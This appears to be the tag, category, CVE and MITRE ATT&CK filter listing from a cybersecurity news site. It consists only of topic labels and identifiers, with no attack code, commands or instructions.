Tags All 0ktapus 5G Access Control Access-as-a-Service Account Compromise Account Takeover Account Theft Active Defense Active Directory Active Directory (AD) ActiveMQ Admin Center Adversarial Machine Learning Adversarial Prompting Adversary Emulation Advertising Technology Adware Aeroflot Africa age verification Agent Agents AI AI (Artificial Intelligence) AI Agents AI Application Security AI Assistant AI Chatbot AI Chatbots AI Code Editor AI Coding AI Crawlers AI Cyber Challenge (AIxCC) AI in Cybersecurity AI in Security AI Kill Chain AI Safety AI Security AI Training Data AI Virus AI-based Fraud Management AI-driven Cyber Warfare AI-driven threats AI-generated content AI-Generated Content AI-powered Development AI-Powered Malware AI-powered toys air_gap AirPods Firmware Airtel akamai Akamai Akira Alert Fatigue algorithmic bias alloca Allowlist Bypass Alternate Data Streams Amazon Amazon Q Amazon Q Developer Amazon Web Services AML Anamorpher Android Android Malware Android Security Android Threats Android Virtualization Framework (AVF) Anomaly Detection ANSI Escape Codes Anthropic Claude Anti-Analysis Antitrust Antivirus Apps APCS API Call API Documentation API Integration API Keys api security API Security apis APIs Apple Apple Beta Program Apple Beta Software Program Apple Developer Program Apple Watch Application Layer Attacks Application Security Apps apt APT APT28 APT43 Arbitrary Code Execution Arbitrary File Write Arbitrary Free Vulnerability Arch User Repository (AUR) Argument Injection Arrest Artificial Intelligence Artificial Intelligence (AI) Artificial Intelligence (AI) in Cybersecurity ASN43350 Asset Management Asset Seizure AsyncRAT AT&T Attack Analysis Attack Path Analysis Attack Surface Attribution Attribution Reporting API Audit Logs Australia Auth0 Authentication Authentication Bypass Authenticator App Authorization Authorization Flaws Automated Patching Automated Updates Automation Automotive Cybersecurity Automotive Security AVideo AWS AWS 
Security AWS Trusted Advisor Azure Azure Active Directory (Azure AD) Azure Blob Storage Backdoor Backdoors Backup and Recovery Banking Malware Banking Trojan BEC Behavioral Analysis Benign Data Beta Program Beta Software Beta Testing biometric authentication Biometrics Bitcoin Black Box Testing Black Hat Black Hat USA Blacklist Bypass Blackmail BlackSuit BlackSuit Ransomware Blameless Culture Blockchain Technology Bloomberg Comdb2 Blue Screen of Death Blue Screen of Death (BSoD) Blue Screen of Death (BSOD) Bluetooth Vulnerability Bot Management Botnet Bots Bragg Gaming Group Branch Prediction Brave Browser Breach of Contract BreachForums Broadcom Broadcom BCM5820X Broken Access Control Browser Extension Browser Extensions Browser Security Brushing Scam Brute-Force Attack Brute-Force Attacks Buffer Overflow Bug Bounty Program Bug Bounty Programs Bug Fix Bug Fixes Bundled Security Burp Suite Business Email Compromise Business Email Compromise (BEC) Business Logic Abuse Buttercup BYOVD Bypass C# C2 C2 Infrastructure CAN bus Canada CAPTCHA Card Testing CCPA Censorship CFIUS Chaos Ransomware ChatGPT ChatGPT Codex Check Kiting Chemia Child Exploitation Children's Online Safety Children's Privacy China China-based threat actor China-based Threat Actor China-Based Threat Actors Chinese State-Sponsored Actors Chinese Threat Actor Chinese-speaking APT Chrome Extension Chrome Web Store Chunked Transfer Encoding CI/CD Integration CIRO CISA CISA 2015 CISA KEV Cisco Cisco IOS Cisco IOS XE Cisco ISE Cisco Talos CISO Citrix City of St. 
Paul Class Action Lawsuit Cleartext Transmission ClickFix Clickjacking Client-Side Validation Clipboard Hijacking Clop Ransomware Clorox CLOUD Act Cloud Computing Cloud Identity Security Cloud Logging Cloud Security cloud_act cloud_sovereignty Cloudflare Cobalt Strike code execution Code Execution Code Golfing Code Injection Code Review Code Security Coding Cognition Cognizant Collaboration Command and Control Command and Control (C2) Command Injection Command Line Interface (CLI) Command-Line Classification Commvault Compatibility Issue Compliance Computer Fraud and Abuse Act Computer Misuse Act Configuration Management Congressional Review Act Context Poisoning Context Switching Context Window Contract Expiration contracts ControlVault Cookie Encryption Copilot Copilot Vision COPPA Copyright counterfeit device Court Ruling Coyote Banking Trojan CPU Vulnerability CRC Check Credential Access Credential Harvesting Credential Theft Credentials Theft Credit Card Fraud Credit Monitoring critical infrastructure Critical Infrastructure Critical National Infrastructure Critical National Infrastructure (CNI) CRM Cross-Origin Resource Sharing (CORS) Crown Jewels Strategy Crypto24 Cryptocurrency Cryptocurrency Theft Cryptocurrency Wallet Theft Cryptography Cryptojacking Cryptomining Cursor IDE Customer Data CVE CVE-2017-11882 CVE-2018-0171 CVE-2021-36260 CVE-2022-1388 CVE-2023-34048 CVE-2023-46604 CVE-2024-23692 CVE-2024-3094 CVE-2024-40766 CVE-2024-45431 CVE-2024-45432 CVE-2024-45433 CVE-2024-45434 CVE-2025 CVE-2025-20265 CVE-2025-20281 CVE-2025-20282 CVE-2025-20337 CVE-2025-21479 CVE-2025-23310 CVE-2025-23311 CVE-2025-24000 CVE-2025-24311 CVE-2025-24919 CVE-2025-24922 CVE-2025-25050 CVE-2025-25215 CVE-2025-25256 CVE-2025-35966 CVE-2025-36512 CVE-2025-36520 CVE-2025-40599 CVE-2025-43300 CVE-2025-46354 CVE-2025-47227 CVE-2025-47228 CVE-2025-48498 CVE-2025-48530 CVE-2025-48807 CVE-2025-49704 CVE-2025-49706 CVE-2025-49707 CVE-2025-49712 CVE-2025-49743 CVE-2025-50165 
CVE-2025-50167 CVE-2025-50168 CVE-2025-50176 CVE-2025-50177 CVE-2025-53132 CVE-2025-53147 CVE-2025-53156 CVE-2025-53652 CVE-2025-53731 CVE-2025-53733 CVE-2025-53740 CVE-2025-53766 CVE-2025-53767 CVE-2025-53770 CVE-2025-53771 CVE-2025-53773 CVE-2025-53774 CVE-2025-53778 CVE-2025-53779 CVE-2025-53781 CVE-2025-53784 CVE-2025-53786 CVE-2025-53787 CVE-2025-53792 CVE-2025-53793 CVE-2025-54132 CVE-2025-54939 CVE-2025-57788 CVE-2025-57789 CVE-2025-57790 CVE-2025-57791 CVE-2025-8088 CVE-2025-8875 CVE-2025-8876 CVSS CWE CWE-119 CWE-125 CWE-288 CWE-319 CWE-494 CWE-502 CWE-763 CWE-787 CWE-79 CWE-824 CWE-918 Cyber Attack Cyber Attacks Cyber Diplomacy Cyber Espionage Cyber Essentials Cyber Incident Cyber Insurance Cyber Kill Chain Cyber Reasoning System (CRS) Cyber Resilience Bill cyber risk Cyber Risk Awareness Cyber Threat Information Sharing Cyber Warfare Cyberattack Cyberattacks cybercrime Cybercrime Cybercrime Forum Cybercrime Investigation Cybercrime-as-a-Service Cybercriminal Underground CyberLayer Cyberpartisans BY cybersecurity Cybersecurity Cybersecurity Assessments Cybersecurity Awareness Cybersecurity Awareness Training cybersecurity education Cybersecurity Governance Cybersecurity Incident Cybersecurity Jobs Cybersecurity Legislation Cybersecurity Policy Cybersecurity Skills Gap cybersecurity talent Cybersecurity Training Cybersecurity Vulnerabilities CyberSentry Cyberstalking Dark Web DARPA DARPA AIxCC Data Aggregators Data Analysis Data and computer security news Data Backup data breach Data Breach Data Breach Notification data breaches Data Broker Data Brokers Data Collection Data Corruption Data Deletion Data Encryption Data Engineering data exfiltration Data Exfiltration Data Fusion Data Harvesting Data Leak Data Leak Site Data Leak Sites Data Leakage Data Loss Data Minimization Data Poisoning data privacy Data Privacy Data Protection Data Recovery Data Resilience Data Retention Data Scraping Data security Data Security Data Silos Data Sovereignty Data Theft 
Data Wiping data_boundary Database Security DDoS DDoS Attack DDoS Attacks Deanonymization Attacks Debian debugging Deepfake Deepfakes default passwords Defense Evasion Delivery Scam Dell Dell ControlVault Dell ControlVault3 Denial of Service Denial-of-Service Denial-of-Service (DoS) Attack Department of Defense dependencies Dependency Management Deprecated Software Deprecation Deserialization Deserialization Vulnerability DevOps DevSecOps DICOM Digital Footprint Digital Hygiene Digital Signatures Digital Sovereignty Digital Transformation Digital Twins Directory Traversal Discord Discord Bots DLL Hijacking DLP DNS DNS Exfiltration DNS Resolution DNSSEC Docker Hub DoH Dolby Atmos Domain Spoofing Domain Squatting DORA DoS attacks DoT Double Extortion Downgrade Attack Doxing DragonForce DripDropper Drive-by Attack Drive-by Download DShield Dual-Use Technology Due Diligence Easy Anti-Cheat Echo Chamber Attack Eclipse ThreadX eCommerce Fraud EDR EDR Killer EDR Killers Education EFF Elasticsearch Elderly Victims Election Security Elevation of Privilege Email Security Embassies EMF Employee Data Employee Training EncryptHub encryption Encryption Encryption Algorithm Vulnerability End-of-Life (EOL) Devices End-of-Life Devices End-to-End Encryption Endpoint Detection and Response (EDR) Endpoint Security Energetic Bear ENISA Technical Implementation Guidance Entra ID EPSS Equation Editor Equifax ERMAC ESET eSIM Espionage ESXi EU Europe Europol EVM Excel exploit Exploit Exploit Development Exploitability Exploitation Exploited Vulnerability Export Controls Exposed Infrastructure exposure and vulnerability management extended detection and response Extortion Extradition F5 Load Balancer Face Morphing Facebook facial recognition Fake Accounts Fake News FakeCaptcha false identification False Positives FBI FCC Federal Government Cybersecurity Fickle Stealer File Integrity Monitoring File Upload Vulnerability FileX Financial Crime Financial Data Financial Fraud Financial 
Institutions Financial Regulator Financial Services Firefox Firewall Firmware Firmware Analysis Firmware Downgrade Firmware Flashing Firmware Security Firmware Signing Firmware Update Vulnerability Firmware Upload Firmware Vulnerability Fitness Tracking Flo Health Fog Security Foreign Adversaries Foreign Influence Foreign Investment Forensic Investigation forensics Fortinet fourth-party risk Foxit Reader Fraud Fraudulent Procurement Freight Forwarding FTC FTS5 Funding Fuzzing Gadget Chain Game Security Gaming Industry Garmin Connect GCP Security GDPR Gemini Gen Z GenAI Security Generative AI Geolocation Data Geopolitics Git Git Parameter Plugin GitHub GitHub Copilot GitHub Issues GitHub Token Google Google Cloud Google Forms Google Gemini Google Jules Google Photos Google Threat Intelligence GoPhish Governance government GPT-5 GPU GRC Great Firewall of China Grok AI GTFOBins gzip hacking Hacking Hacking Back hacktivism Hacktivism Hard Link Hard Link Vulnerability hardware flaws Hardware Hacking Health Information Healthcare Healthcare Industry Healthcare Sector Heap Corruption HeartCrypt HijackLoader Hikvision Home Theater honeypots Hong Kong Hotel Industry HTTP Chunked Transfer Encoding HTTP PUT Request HTTP Request HTTP Request Smuggling HTTP/1.1 HTTP/2 HTTP/3 HTTPS Human Resources Human Trafficking HUMINT Hunt.io HW-Q990F Hypervisor Security IAM ICO IDE Identity and Access Management Identity and Access Management (IAM) Identity Fraud Identity Governance Identity Monitoring Identity Security Identity Services Engine Identity Theft Identity Verification IDS/IPS iiNet Image I/O Image Manipulation Image Rendering Image Scaling Attacks ImageIO Immigration Fraud Impersonation Imperva incident response Incident Response Incorrect Permissions Indicators of Compromise Information Disclosure Information Sharing Information Stealer Information Theft Information Warfare Infostealer Infotainment System Infrastructure Persistence Initial Access Initial Access Broker (IAB) 
Injection Insider Threat Insider Threat Detection Instagram Insurance Industry Integer Overflow Intel Intellectual Property Theft Interlock Interlock Ransomware Internal Network Mapping International Law Internet Archive Interpol INTERPOL Intradev Intune Investment Scam Investment Scams iOS iOS 26 IoT IoT Devices IoT Security iPadOS 26 iPhone IR35 Iran IT Modernization IT Service Desk IT Systems Failure IT Worker Schemes IT workers Italy Jailbreak Jailbreaking Japan Java JavaScript Jeff Moss Jenkins Juice Jacking JuicyPotato Kaseya Kaspersky Kawa4096 KaWaLocker KB5063709 KB5063875 KB5063877 KB5063878 Kerberoasting Kernel-Level Exploitation Keylogger Kill Switch Kimsuky Knowledge Distillation Known Issue Rollback (KIR) KYC KYC Verification L1TF Reloaded LameHug Lapsus$ Laptop Farm Large Language Models Large Language Models (LLM) Large Language Models (LLMs) Lateral Movement Law Enforcement Law Enforcement Access Law Enforcement Action Law Enforcement Operation Lawrence Livermore National Laboratory Lawsuit Leadership Ledger Legacy Systems Legal Action Legal Issues Legal Risk legislation Legislation LFI LibreWolf Libsodium Licensing Linux Linux Distributions Linux Kernel Linux Malware Linux Security Liquid Glass LiteSpeed Living off the Land Living off the Land (LotL) LLM LLM (Large Language Model) LLM Agents LLM Guardrails LLM Security LLMs Location Tracking Log Management Logging Logging and Monitoring Lorex Low-Code/No-Code Loyalty Points Fraud LSQUIC LummaC2 LunaSpy LVMH M365 Copilot Machine Identity Management Machine Learning MachineKey MacOS MacOS Tahoe 26 MadeYouReset Mailto Links Malicious Update Malvertising Malware Malware Analysis Malware Campaign Malware Development Malware Research Malware-as-a-Service Malware-as-a-Service (MaaS) Malware: CORNFLAKE.V3 Malware: WINDYTWIST.SEA Malwarebytes Managed Detection and Response (MDR) Managed Service Provider (MSP) Managed Service Providers Mandatory Reporting Mandiant Manpower Manufacturing Sector maritime 
industry Marshal.load MAS Hijacking MaterialX MCP MCP (Model Context Protocol) MCP (Model Context Protocol) Security MedDream PACS MedDream PACS Premium Memory Corruption Memory Exhaustion Memory Poisoning Mermaid Meta Metadata Metasploit MFA MFA Bombing MFA Bypass MiCollab Microsoft Microsoft 365 Microsoft Account Security Microsoft Active Protections Program (MAPP) Microsoft Azure Microsoft Defender for Endpoint Microsoft Exchange Server Microsoft Office Microsoft Patch Tuesday Microsoft Recall Microsoft Security Response Center Microsoft SharePoint Microsoft Teams Microsoft Windows Mikko Hypponen Military Technology Mimecast Mimikatz Mirai Misconfiguration Misinformation Mitigation Mitigation Strategies MITRE MITRE ATT&CK MiVoice MX-ONE mobile app security Mobile App Security Mobile Device Security Mobile Security Mobile Threats Model Context Protocol (MCP) Money Laundering Mongolia mount MOVEit MRG Effitas Multi-Agent Systems Multi-Cloud Multi-Factor Authentication Multi-Factor Authentication (MFA) Multi-Modal Security Murky Panda N-able Namespace Naming Conventions Narrative Steering NAS Nation-State Actor Nation-State Actors National Security National Security Agency (NSA) NATO Natural Language Processing NDI (Network Device Interface) Negligence Net Financing Netherlands Network Device Exploitation Network Isolation Network Outage Network Security Network Shutdown Network Traffic Analysis NetXDuo NForce Entertainment NHS NIS 2018 NIS2 Directive NIST NIST Cybersecurity Framework (CSF) Node.js Nomani Trojan Non-Punitive Reporting North Korea North Korean IT Workers Notification Notifications npm NPM NPM Package NPM Registry Nuclear Proliferation NULL Host Header Null Pointer Dereference NVIDIA Triton Inference Server OAuth Obfuscation OCCULT OCI OFAC Okta Ollama Online Safety online safety act Online Scams Online Search ONT Open Source Open Source Security Open Source Security Tools Open Source Software Open Source Tool Open Source Tools Open-Source 
Open-Source Software Open-Source Tool OpenAI OpenEXR OpenHands OpenLiteSpeed OpenSynergy Blue SDK Operating System Update Operating Systems Operation Checkmate Operation Serengeti 2.0 Operational Technology (OT) Orange Belgium Orange Group Organizational Culture OSINT OTX Out-of-bounds Read Out-of-bounds Write Out-of-Bounds Write Outage outsourcing OWASP package management Packet Injection palm vein recognition Palo Alto Networks Paper Werewolf Parental Guidance Passkeys Password Management Password Reset Password Security Passwordless Authentication passwords Passwords Patch Patch Available Patch Bypass Patch Generation Patch Management Patch Tuesday Patching Path Traversal Path Validation Payload PDF PDF-XChange Editor Penetration Testing Pentest PerfektBlue Permissions Perplexity Persistence Persistence Mechanism Persistent Compromise Personal Data Personal Information Personally Identifiable Information (PII) phishing Phishing Phishing Attacks Phishing Simulations Phison PHP Physical Attack PII pKVM Podman Political Motivation Polyglot Files Port Exposure Post-Quantum Cryptography (PQC) Posture Check power adapter safety Power Consumption Analysis PowerShell Preorder Fraud pricing privacy Privacy Privacy Invasion Privacy Regulations Privacy Sandbox privacy settings Privacy Settings Privacy Violation Privateers Privilege Escalation Privilege Management PRNG Procurement Product Management Product Recall Programming Fundamentals Prompt Engineering prompt injection Prompt Injection Proof of Concept Proof of Vulnerability (PoV) Protocol Buffers Proton proxmox PS1Bot PUA/PUP Public Access Public Wi-Fi Security pwn Pwn2Own Python Qi2 Qilin Qilin Ransomware QR Code Scam QR Codes QSR Fraud Qualcomm Adreno Quantum Computing Quantum-based risks QUIC Quick Machine Recovery RaaS Race Condition RADIUS RAG Rails RAM Disk Ramp (Cybercrime Forum) Random Number Generation RansomHub ransomware Ransomware Ransomware Payments Ransomware Rebrand Ransomware-as-a-Service 
Ransomware-as-a-Service (RaaS) Rapid Reset Attack Rapid7 RAT RBAC RC4 RCE RDP Re-identification RealBlindingEDR Rear Speakers Recall (feature) Reconnaissance Reconnaissance Scan Recruitment Red Team Red Team/Blue Team Red Teaming Reflected XSS Registry Key regulation Regulation Regulatory Reporting Rejetto HFS Remediation Remote Access Remote Access Attacks Remote Access Trojan Remote Access Trojan (RAT) Remote Code Execution Remote Code Execution (RCE) Remote Control Remote Work Remote Workers Report Reporting Reputational Attack Responsible Disclosure Retaliation Retbleed Reverse DNS Lookup (PTR) Reverse Engineering reverse shell ReversingLabs REvil RFQ Scam Risk Management Risk-Based Vulnerability Management (RBVM) RMM Tool Abuse robots.txt Robots.txt ROI Romance Scams RomCom Rootkit Roskomnadzor Router Vulnerability Routing Royal Ransomware RPC Ruby Runtime Controls Runtime Protection Russia Russian FSB Russian Hackers Russian State-Sponsored Actor Russian Threat Actors S3 Bucket SaaS SailPoint Salesforce Salt Typhoon Samsung Samsung Knox Sanctions Sanctions Evasion Sandbox Escape Sandboxing SAP SarangTrap SASE Scam Scams Scanning Scattered Spider scholarship Screen Capture ScriptCase Search Engine Indexing SEC Filing Secret Scanning Secrets Management Secure by Design Secure Design Principles Secure Firewall Management Center (FMC) Security Security Audit Security Awareness Security Awareness Training security camera Security Culture Security Information and Event Management (SIEM) Security Operations Security Operations Center (SOC) Security Patch Security Patches Security Posture Management Security Update Security Updates Security Vulnerabilities Security Vulnerability Security Wrappers Seed Phrase Self-Replication Self-XSS Semgrep Semi-Supervised Learning Sentencing SentinelOne Server-Side Template Injection Service Degradation Service Desk Service Disruption SESIP Level 5 Session Hijacking Settings.json Settlement Sextortion SHA-1 SHA-256 sha256 Shared 
Storage API SharePoint Shellcode Loader ShinyHunters Side-Channel Attack Sideloading SIEM SIGINT Sigma Rules SIKE Silent Crow Silk Typhoon SIM Swapping Single Sign-On (SSO) Sinkhole skill development Skitnet Skuld Stealer Sleepwalk Attack Sliver SMA 100 Series Small and Medium-sized Enterprises Small Models Smart Contract Auditing Smart Devices smart home Smart Install smart lock smartwatch security Smishing SNI5GECT Sniffing SNMP Snort Rules SOC social engineering Social Engineering Social Media Social Media Scams Social Media Security Social Security Number (SSN) SOCMINT SoftEther Software Licensing Software Release Software Security Software Updates Software Vulnerability Solana Solidity SonicWall SonicWall SMA 100 Sophos Soundbar SoundBill Source Code Leak Sourcegraph South Korea Spam Spearphishing Spectre Speed Cameras Splunk Sponsorship Management System (SMS) Sprint Spyware SQL Injection SQLi SQLite Squirrel Tool SSD Failure SSH Tunneling sshd SSL VPN SSRF Stack Overflow State Department Static Analysis Static Code Analysis Static Tundra Steam Stolen Credentials Storm-2603 strategy Streaming Issues Stuxnet Submarine Cables Subwoofer Supply Chain Attack Supply Chain Attacks Supply Chain Fraud Supply Chain Risk supply chain security Supply Chain Security Supply Chain Vulnerability Suricata Surveillance Suspicious Activity Report SVG Swagger Swatting Symlink Symlink Vulnerability Synology Synthetic Data Generation T-Mobile Taiwan tar-fs TarFile Targeted Attack TCP Port 443 Technology Telecom Telecommunications Telegram Tenda AC6 Tesla The Com Third-Party Breach Third-Party Cyber Experts Third-Party Investigation Third-Party Risk third-party risk management Threat Actor Threat Actor: UNC5518 Threat Actor: UNC5774 Threat Actors Threat Detection Threat Hunting Threat Intelligence Threat Modeling threats Threats Timing Vulnerability Tizen OS TLS Tool Poisoning ToolShell TPG Telecom Trade Secret Theft Traffic Management Trail of Bits training Transient Execution 
Transparency Trojan Trolling Trust Trust Bypass Trust-on-first-use Trusted Execution Environment (TEE) TVOS 26 Two-Factor Authentication Two-Factor Authentication (2FA) Typosquatting UART UAT-5918 UAT-7237 Ubuntu UEBA UI Automation (UIA) UK UK Government UK Home Office Ukraine Unauthenticated Access Unauthenticated Vulnerability Unauthorized Access UNC3944 UNC6148 Unicode Unicode Tag Uninitialized Pointer United Kingdom United States UnMarker Update Block UPnP URL Safe URL Shortening US Government USA USB Data Blocker USB Devices USB Security User Awareness User Behavior Analysis User Experience User-After-Free User-Agent usernames vCenter vendor risk management Verizon Version Control Vidar video doorbell Video Generation Video Sharing Platform Violence-as-a-Service Visual Studio Code VMware VMware ESXi VMware vSphere Volt Typhoon Voter Fraud Voting Machines VPN VPS VS Code VS Code Extension Vulnerabilities vulnerability Vulnerability Vulnerability Assessment Vulnerability Detection vulnerability disclosure Vulnerability Disclosure Vulnerability Discovery Vulnerability Exploit Vulnerability Exploitation vulnerability management Vulnerability Management Vulnerability Patch Vulnerability Reporting Vulnerability Research Vulnerability Scanning WAAP Attacks Warlock Warlock Group WatchOS 26 watchTowr Watermarking Web Application Firewall (WAF) Web Crawling Web Defacement Web Hosting Web Hosting Provider Web Shell Web Traffic Analysis Web3 Security Webshell WhatsApp Whistleblowing WiFi Sensing Windows Windows 10 Windows 11 Windows Backup Windows Hello Windows Kerberos Windows Recall Windows Recovery Environment Windows Server 2025 Windows Update Windows Updates WinRAR Wire Wire Fraud Wireless Charging Wireless Power Consortium WMI WordPress WordPress Plugin Vulnerability Workaround World Leaks xdr XDR XenoRAT XSS XSS.is XZ-Utils Backdoor Yemen Cyber Army Youth Cybersecurity YouTube Zen Browser Zero Trust Zero-Click Attack Zero-Click Exploit Zero-day Zero-day Exploit 
Zero-Day Exploit Zero-Day Vulnerabilities Zero-day Vulnerability Zero-Day Vulnerability ZombAI Zscaler
Categories All Access Control Access Management Account Security AI Development AI Ethics AI in Cybersecurity AI in Security AI Security API Security Application Governance Application Security APT APT Groups Artificial Intelligence Artificial Intelligence (AI) Security Artificial Intelligence in Cybersecurity Artificial Intelligence Security Authentication Authentication and Access Control Authentication Methods Automated Security Backup and Recovery Bot Management Botnet Takedown Botnets and Malware Breach Notification Browser Security Business and Finance Business Strategy Capture the Flag (CTF) Career Development Censorship Technology Certification and Compliance Cloud Computing Cloud Computing Security Cloud Security Code Review/Analysis Collaboration Tools Compliance Compliance and Governance Configuration Management Consumer Electronics Container Security Credential Management Critical Infrastructure Security Cryptocurrency Security Cryptography Cyber Espionage Cyber Law Cyber Law and Ethics Cyber Law and Legislation Cyber Law and Regulation Cyber Threat Intelligence Cyber Warfare Cyberattack Cybercrime Cybercrime Investigation Cybercrime Investigations Cybersecurity Cybersecurity Awareness Cybersecurity Competition Cybersecurity Conferences Cybersecurity Education Cybersecurity Education and Training Cybersecurity Incident Response Cybersecurity Intelligence Cybersecurity Law and Compliance Cybersecurity Law and Policy Cybersecurity Law Enforcement Cybersecurity Leadership Cybersecurity Policy Cybersecurity Policy and Regulation Cybersecurity Policy and Strategy Cybersecurity Threat Intelligence Cybersecurity Threats Data Breach Data Breach Investigation Data Breach Notification Data Exfiltration Data Governance Data Integrity Data Leakage Prevention Data Loss Prevention Data Privacy Data Privacy and Protection Data Protection Data Security Data Security and Privacy Data Security Incident Database Security Device Hardening DevSecOps Digital Forensics 
Disinformation Domain Name System (DNS) Security Driver Security eCommerce Security Economics Email Security Embedded Systems Security Encryption Encryption Policy End of Life Endpoint Detection and Response (EDR) Endpoint Security Espionage Ethical Implications of AI Exploit Exploit Analysis Exploit Development Exploit Prevention Exploit Techniques Financial Crime Financial Sector Cybersecurity Financial Security Financial Services Financial Technology (FinTech) Firmware Exploitation Firmware Security Fraud Fraud and Financial Crime Fraud Detection Fraud Detection and Prevention Fraud Prevention Gaming Security Geopolitics of Cybersecurity Global Cyber Attack Reports Governance, Risk, and Compliance (GRC) Government & Policy Government Cybersecurity Government Cybersecurity Policy Government Policy Government Regulation Hardware Security Healthcare Cybersecurity Identity and Access Management Identity and Access Management (IAM) Identity Security Image Forensics Incident Response Incident Response and Recovery Industrial Control Systems (ICS) Security Information Security Information Security Conferences Infrastructure Security Insider Risk Management Insider Threat Insurance International Cooperation International Relations and Cybersecurity Internet of Things (IoT) Security Intrusion Detection Intrusion Detection and Prevention Systems IoT Security Job Postings Law Enforcement Law Enforcement Actions Legal and Compliance Legal and Regulatory Legal Sector Cybersecurity Linux Security LLM Security Machine Learning Machine Learning Engineering Machine Learning for Security Malware Analysis Malware Distribution Medical Device Security Medical Software Security Messaging Security Microsoft Security Mobile Malware Mobile Security Mobile Threat Defense Nation-State Actors National Security Network Forensics Network Security Network Security Monitoring Online Safety Online Scams Operating System Security Operating Systems Operating Systems Security Patch Analysis Patch 
Management Patching Penetration Testing Phishing Phishing and Scams Phishing Attacks Phishing Awareness Phishing Defense Phishing Prevention Physical Security Policy & Regulation Policy and Regulation Privacy Privacy & Data Protection Privacy and Data Protection Privacy and Security Privacy Compliance Privacy Concerns Privacy Enhancing Technologies Privacy Law Privacy Regulations Privacy Violations Product Announcement Product Reviews Ransomware Ransomware Attack Ransomware Attacks Ransomware Defense Ransomware Defense and Mitigation Ransomware Protection Ransomware Protection and Mitigation Ransomware Protection and Response Ransomware Response Regulatory Compliance Reverse Engineering Risk Management Router Security Security Automation Security Awareness Security Awareness and Training Security Awareness Training Security Engineering Security Information and Event Management (SIEM) Security Management Security Operations Security Orchestration, Automation and Response (SOAR) Security Software Security Strategy Security Training and Awareness Security Validation Service Availability Smart Contract Security Social Engineering Social Engineering Attacks Social Media Security Software Development Software Security Software Supply Chain Security Software Updates Software Vulnerability Standards and Compliance Supply Chain Security System Administration Telecommunications Telecommunications Security Third-Party Risk Management Third-Party Security Threat Actor Threat Actor Activity Threat Actors Threat Analysis Threat Detection Threat Detection and Analysis Threat Detection and Incident Response Threat Detection and Mitigation Threat Detection and Prevention Threat Detection and Response Threat Intelligence Threat Research Usability Virtualization Security Vulnerability Vulnerability Analysis Vulnerability and Exploit Vulnerability and Patch Management Vulnerability Assessment Vulnerability Disclosure Vulnerability Exploitation Vulnerability Management Vulnerability 
Research Web Application Security Web Browser Security Web Browsers Web Hosting Security Web Security Web Server Security Web3 Security Windows Security
Vulnerabilities All CVD-2024-0096 CVE-2017-11882 CVE-2018-0171 CVE-2018-20835 CVE-2019-5420 CVE-2021-20035 CVE-2021-20038 CVE-2021-20039 CVE-2021-36260 CVE-2022-1388 CVE-2023-34048 CVE-2023-3519 CVE-2023-36884 CVE-2023-46604 CVE-2023-48788 CVE-2024-12905 CVE-2024-13973 CVE-2024-13974 CVE-2024-2088 CVE-2024-23692 CVE-2024-3094 CVE-2024-37085 CVE-2024-38196 CVE-2024-38475 CVE-2024-40766 CVE-2024-41713 CVE-2024-45431 CVE-2024-45432 CVE-2024-45433 CVE-2024-45434 CVE-2024-47575 CVE-2024-49039 CVE-2024-50623 CVE-2024-55550 CVE-2024-55956 CVE-2024-9680 CVE-2025-053 CVE-2025-0589 CVE-2025-20265 CVE-2025-20281 CVE-2025-20282 CVE-2025-20337 CVE-2025-21479 CVE-2025-23310 CVE-2025-23311 CVE-2025-24000 CVE-2025-24311 CVE-2025-24485 CVE-2025-24919 CVE-2025-24922 CVE-2025-25050 CVE-2025-25214 CVE-2025-25215 CVE-2025-25256 CVE-2025-26469 CVE-2025-27724 CVE-2025-30388 CVE-2025-31324 CVE-2025-32731 CVE-2025-32819 CVE-2025-32820 CVE-2025-32821 CVE-2025-35966 CVE-2025-36512 CVE-2025-36520 CVE-2025-36548 CVE-2025-3928 CVE-2025-40596 CVE-2025-40597 CVE-2025-40598 CVE-2025-40599 CVE-2025-41420 CVE-2025-42999 CVE-2025-43300 CVE-2025-46354 CVE-2025-46410 CVE-2025-47227 CVE-2025-47228 CVE-2025-47984 CVE-2025-48498 CVE-2025-48530 CVE-2025-48732 CVE-2025-48807 CVE-2025-49704 CVE-2025-49706 CVE-2025-49707 CVE-2025-49712 CVE-2025-49743 CVE-2025-50128 CVE-2025-50165 CVE-2025-50167 CVE-2025-50168 CVE-2025-50171 CVE-2025-50176 CVE-2025-50177 CVE-2025-52914 CVE-2025-53084 CVE-2025-53109 CVE-2025-53132 CVE-2025-53147 CVE-2025-53156 CVE-2025-53399 CVE-2025-53652 CVE-2025-53731 CVE-2025-53733 CVE-2025-53740 CVE-2025-53766 CVE-2025-53767 CVE-2025-53770 CVE-2025-53771 CVE-2025-53773 CVE-2025-53774 CVE-2025-53778 CVE-2025-53779 CVE-2025-53781 CVE-2025-53784 CVE-2025-53786 CVE-2025-53787 CVE-2025-53792 CVE-2025-53793 CVE-2025-54132 CVE-2025-54136 CVE-2025-54309 CVE-2025-54939 CVE-2025-54948 CVE-2025-54987 CVE-2025-55284 CVE-2025-57788 CVE-2025-57789 CVE-2025-57790 CVE-2025-57791 CVE-2025-6218 
CVE-2025-6704 CVE-2025-7382 CVE-2025-7624 CVE-2025-7771 CVE-2025-8088 CVE-2025-8875 CVE-2025-8876 CVE-XXXX-Citrix_NetScaler_zero-day CVE-XXXX-Log4j
MITRE ATT&CK TTP All Application Layer Protocol: T1071 Cloud Accounts: T1078.004 Command and Scripting Interpreter: T1059 Command and Scripting Interpreter: T1059.003 Compromise: T1190 Compromised Credentials: T1552 Content Injection: T1659 Credentials from Password Stores: T1555 Data Encrypted for Impact: T1486 Defacement: T1659 Deobfuscate/Decode Files or Information: T1140 DNS Management: T1659 Drive-by Compromise: T1189 Email Forwarding Rule: T1114.003 Exploit Public-Facing Application: T1190 Exploitation for Client Execution: T1203 Exploitation for Privilege Escalation: T1068 Exploitation of Remote Services: T1210 External Remote Services: T1133 File and Directory Discovery: T1083 Impair Defenses: T1562 Improper Access Control: T1534 Indicator Removal: T1070 Ingress Tool Transfer: T1105 Inhibit System Recovery: T1490 Input Capture: T1056 Lateral Tool Transfer: T1570 Modify Registry: T1112 Native API: T1106 Non-Application Layer Protocol: T1095 Obfuscated Files or Information: T1027 OS Credential Dumping: T1003 Path Traversal: T1570 Phishing: T1566 PowerShell: T1059.001 Process Injection: T1055 Proxy: T1090 Registry: T1112 Remote Code Execution: T1210 Remote Services: T1021 Replication Through Removable Media: T1091 Scheduled Task/Job: T1053 Screen Capture: T1113 Service Stop: T1489 Spearphishing Attachment: T1193 Spearphishing Link: T1192 Supply Chain Compromise: T1195 System Information Discovery: T1082 Trusted Relationship: T1199 Unsecured Credentials: T1552 Valid Accounts: T1078 Web 